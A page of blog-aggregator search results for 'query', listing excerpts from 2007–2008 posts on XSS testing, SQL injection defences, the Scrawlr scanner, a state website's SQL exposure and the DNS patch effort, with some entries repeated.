SEARCH RESULTS
 
Showing 1-10 of 29 records
 
Expand article

Automating web application security testing

2007-07-16 11:40:00 by Panayiotis Mavrommatis in Google Online Security Blog
 
...query parameters is vulnerable to reflected XSS. With a vulnerable application, an attacker can craft a malicious URL and send it to the victim via email or any other mode of communication. When the victim visits the tampered link, the page is loaded along with the injected script that is executed in the context of the victim's session The...
 
Tags: web application, application, input, input parameters, accepts user input, xss, xss vulnerabilities, security, security team check
 
 
 
 
Expand article

Streaming SQL Approaches Insist in Ignoring Causality by PatternStorm

2008-09-05 14:25:35 by Tim Bass in The Complex Event Processing Blog
 
...query that StreamBase cannot solve (but Oracle can) is the following: correlate the stream that contains the total number of cars on the road for each time interval with the stream that contains the total average speed of the cars on the road for each time interval in order to detect the situation where the avergae speed is below 45 and the...
 
Tags: sql, sql approaches insist, cars stream, stream, average speed event, event, sql languages, languages, cars event
 
 
 
 
Expand article

New faces and predictions for the New Year...

2008-01-22 22:11:00 by sdl in The Security Development Lifecycle
 
...query of the NVD with "Vendor=Microsoft", "Start Date= January 2007", and "End Date=December 2007" returns 254 matches. A query of NVD without selecting any vendor, and choosing "Start Date= January 2007", and "End Date=December 2007" returns 6532 matches. If my math is correct, that states that Microsoft was responsible for 3.8885 percent of...
 
Tags: sdl team, team, sdl, sdl blog crew, cve, cve vulnerabilities, microsoft, single prediction, microsoft products
 
 
 
 
Expand article

Oklahoma Department of Corrections SQL exposure

The Article has images
2008-04-21 11:23:45 by Evan Francen in The Breach Blog
...query as a parameter Fortunately, he didn't accuse me of hacking their site. In fact, he seemed appreciative and promised to pass the details along to their developers The following day, both the SVOR and Offender Search were taken down "for routine maintenance However, when the sites came back up, I noticed that that the "print-friendly...
 
Tags: social security, oklahoma, sql, residents, oklahoma residents, bad, bad news, department, sql query
 
 
 
 
Expand article

Giving SQL Injection the Respect it Deserves

2008-05-15 18:45:00 by sdl in The Security Development Lifecycle
 
...query through the application. This vulnerability allows for unauthorized, interactive, logon to a SQL server which may result in the execution of malicious commands leading to the possible modification (or deletion) of Operating System or user data Combining the use of parameterized queries and stored procedures helps to mitigate the risk of...
 
Tags: sql, sql injection bug, sql injection requirements, sql injection attack, sql server, sql execute-only permission, malicious sql payload, sql injection, sql injection vulnerability
 
 
 
 
Expand article

Limitations in Scrawlr

2008-06-27 07:18:51 by Editor in Cheap Hack
 
One of the measures Microsoft recently took in reaction to a wave of SQL injection attacks was to point people to the crawling tool Scrawlr from HP . Now Mike Tracy of Matasano Security has a blog discussing some of the limitations in that tool and how to get around some of them . They refer to it as "... a cripple-ware SQL injection scanner"...
 
Tags: scrawlr, sql injection, sql injection attacks, microsoft, measures microsoft recently, tool scrawlr, tool, query, dynamic query
 
 
 
 
Expand article

Massive Coordinated Patch Effort To DNS System Flaw

2008-07-08 17:56:25 by Editor in Cheap Hack
 
...query IDs VU#927905 - BIND version 8 generates cryptographically weak DNS query identifiers The advisory lists 101 DNS servers, their status and the date of their last update. For the large majority of the servers the status is "Unknown," but several important ones are listed as Vulnerable and all of these were patched either today or late...
 
Tags: microsoft monthly patches, microsoft, dns servers, isc bind, isc, servers, attacks, internet systems consortium, status
 
 
 
 
Expand article

Massive Patch Effort Coordinated for DNS System Flaw

2008-07-08 17:56:25 by Editor in Cheap Hack
 
...query IDs VU#927905 - BIND Version 8 generates cryptographically weak DNS query identifiers The advisory lists 101 DNS servers, their status and the date of their last update. For the large majority of the servers the status is "Unknown," but several important ones are listed as Vulnerable and all of these were patched either today or late...
 
Tags: microsoft monthly patches, microsoft, dns servers, isc bind, isc, servers, attacks, internet systems consortium, status
 
 
 
 
Expand article

Limitations in Scrawlr

2008-06-27 07:18:51 by Editor in Cheap Hack
 
One of the measures Microsoft recently took in reaction to a wave of SQL injection attacks was to point people to the crawling tool Scrawlr from HP . Now Mike Tracy of Matasano Security has a blog discussing some of the limitations in that tool and how to get around some of them . They refer to it as "... a cripple-ware SQL injection scanner"...
 
Tags: scrawlr, sql injection, sql injection attacks, microsoft, measures microsoft recently, tool scrawlr, tool, query, dynamic query